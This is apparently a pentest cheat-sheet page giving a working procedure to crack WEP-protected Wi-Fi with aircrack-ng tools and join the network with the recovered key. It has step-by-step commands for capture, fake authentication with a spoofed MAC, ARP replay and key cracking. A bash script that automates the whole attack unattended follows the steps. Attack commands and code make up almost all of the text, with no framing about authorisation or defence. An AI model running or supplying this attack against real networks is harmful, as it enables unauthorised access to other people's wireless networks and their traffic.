Overview

WEP (Wired Equivalent Privacy) is a broken encryption protocol. It encrypts each frame with RC4 using a 24-bit initialization vector (IV) prepended to a static key; the IV space is small enough that IVs repeat quickly, and some IVs leak information about the key bytes, so once enough frames with distinct IVs have been captured the key can be recovered statistically. ARP replay is used to make the AP generate those frames quickly instead of waiting for legitimate traffic. The attack uses the aircrack-ng suite: airodump-ng captures the IVs, aireplay-ng generates the traffic, and aircrack-ng recovers the key.

Automatic Attack (besside-ng)

besside-ng automates the whole WEP attack (fake authentication, ARP replay and cracking) in a single command. It needs a monitor-mode interface, so kill interfering processes and enable monitor mode first (airmon-ng renames the interface, typically to wlan0mon); recovered keys are written to besside.log in the working directory:
airmon-ng check kill
airmon-ng start wlan0
besside-ng -c <CHANNEL> -b <BSSID> wlan0mon -v

Manual Attack

1. Find the WEP Network

Scan all bands to identify WEP targets (look for WEP in the ENC column):
airodump-ng --band abg <WIFI-INTERFACE>

2. Focus on Target Network

Capture traffic and write to file:
airodump-ng -w wep-capture --bssid <BSSID> --channel <CHANNEL> <WIFI-INTERFACE>

3. Fake Authentication

Associate with the AP so that it accepts injected frames. The source address given with -h must be the MAC the interface actually transmits from: either use the card's own address or set the spoofed one with macchanger while the interface is down (for example macchanger -m F0:00:00:00:00:00 <WIFI-INTERFACE>), otherwise aireplay-ng warns that the interface MAC does not match and the AP may ignore the frames. The same address must be used in the ARP replay step:
sudo aireplay-ng -1 0 -a <BSSID> -h F0:00:00:00:00:00 -e "NETWORK-NAME" <WIFI-INTERFACE>

4. ARP Replay Attack

Generate traffic to force the AP to produce new IVs:
sudo aireplay-ng --arpreplay -b <BSSID> -h F0:00:00:00:00:00 <WIFI-INTERFACE>

5. Crack the Key

Run once enough IVs have been captured. aircrack-ng's default PTW attack on ARP traffic typically needs around 20,000 IVs for a 40-bit key and 40,000–85,000 for a 104-bit key; the older FMS/KoreK statistical attack (-K) needs several hundred thousand. aircrack-ng can be started while airodump-ng is still capturing and re-run as the file grows. airodump-ng appends a -01 suffix to the capture name:
sudo aircrack-ng -a 1 wep-capture-01.cap

WEP Connection

wpa_supplicant config, saved as /tmp/client.conf. Give the key as the hex digits printed by aircrack-ng with the colons removed and without quotes; a quoted value is interpreted as an ASCII key:
network={
    ssid="<ESSID>"
    key_mgmt=NONE
    wep_key0=<KEY>
    wep_tx_keyidx=0
}
Connect (leave monitor mode first so the interface is back to wlan0 in managed mode):
sudo airmon-ng stop wlan0mon
sudo wpa_supplicant -i wlan0 -c /tmp/client.conf
Get an IP address:
sudo dhclient wlan0 -v
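The manual procedure (steps 2 to 5) and the hand-off to the wpa_supplicant configuration, as an added example that is not part of the original page or of the aircrack-ng project. The function names extract_wep_key, write_wep_config, wep_attack and demo_parse are hypothetical; wep_attack only wraps the aireplay-ng/airodump-ng/aircrack-ng commands shown above and must run as root against a monitor-mode interface, while demo_parse exercises the parsing and config writing offline on a constructed sample of aircrack-ng output.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): helpers around the manual
# aircrack-ng WEP workflow. Function names are hypothetical.
set -eu

# Pull the key out of saved aircrack-ng output such as
#   KEY FOUND! [ 1F:2E:3D:4C:5B ]
# and print it as plain hex digits, which is the form wpa_supplicant expects.
# Returns 1 if no key line is present or its length is not 40 or 104 bits.
extract_wep_key() {
  local line key
  line=$(grep -m1 'KEY FOUND!' "$1" || true)
  [ -n "$line" ] || return 1
  key=$(printf '%s\n' "$line" \
        | sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *].*/\1/p' \
        | tr -d ':' | tr 'a-f' 'A-F')
  case ${#key} in
    10|26) printf '%s\n' "$key" ;;
    *) return 1 ;;
  esac
}

# Write a wpa_supplicant network block for an open-system WEP network.
# The hex key is written unquoted; quoting it would make wpa_supplicant
# treat the digits as an ASCII passphrase.
write_wep_config() {
  local essid=$1 key=$2 out=$3
  cat > "$out" <<EOF
network={
    ssid="$essid"
    key_mgmt=NONE
    wep_key0=$key
    wep_tx_keyidx=0
}
EOF
}

# Unattended version of manual steps 2 to 5 (hypothetical wrapper, needs
# root and a monitor-mode interface). Uses the card's own MAC for fake
# auth and replay so injected frames are not dropped for a MAC mismatch,
# and re-runs aircrack-ng every minute against the growing capture.
wep_attack() {
  local iface=$1 bssid=$2 channel=$3 essid=$4 prefix=${5:-wep-capture}
  local mac dump_pid replay_pid key=""
  mac=$(cat "/sys/class/net/$iface/address")

  airodump-ng -w "$prefix" --bssid "$bssid" --channel "$channel" "$iface" \
      >/dev/null 2>&1 </dev/null &
  dump_pid=$!
  sleep 5                                   # let airodump-ng settle on the channel
  aireplay-ng -1 0 -a "$bssid" -h "$mac" -e "$essid" "$iface"
  aireplay-ng --arpreplay -b "$bssid" -h "$mac" "$iface" >/dev/null 2>&1 </dev/null &
  replay_pid=$!

  while [ -z "$key" ]; do
    sleep 60
    # -b pins the BSSID so aircrack-ng never prompts for a network index
    aircrack-ng -a 1 -b "$bssid" -q "${prefix}-01.cap" \
        >"${prefix}.crack.log" 2>&1 </dev/null || true
    key=$(extract_wep_key "${prefix}.crack.log" || true)
  done
  kill "$replay_pid" "$dump_pid" 2>/dev/null || true
  printf '%s\n' "$key"
}

# Offline demonstration on a constructed sample of aircrack-ng output
# (no real capture involved): prints the generated config, then the key.
demo_parse() {
  local tmpd key
  tmpd=$(mktemp -d)
  printf ' [00:00:03] Tested 1514 keys (got 31248 IVs)\n\n KEY FOUND! [ 1F:2E:3D:4C:5B ] \n\tDecrypted correctly: 100%%\n' \
      > "$tmpd/crack.log"
  key=$(extract_wep_key "$tmpd/crack.log")
  write_wep_config "ExampleNet" "$key" "$tmpd/client.conf"
  cat "$tmpd/client.conf"
  rm -rf "$tmpd"
  printf '%s\n' "$key"
}

if [ "${1:-}" = demo ]; then demo_parse; fi
```

Run the file with the argument demo to see the constructed sample turned into a config block; a real run would call wep_attack with the monitor interface, BSSID, channel and ESSID, feed its printed key to write_wep_config, and then continue with the connection steps above.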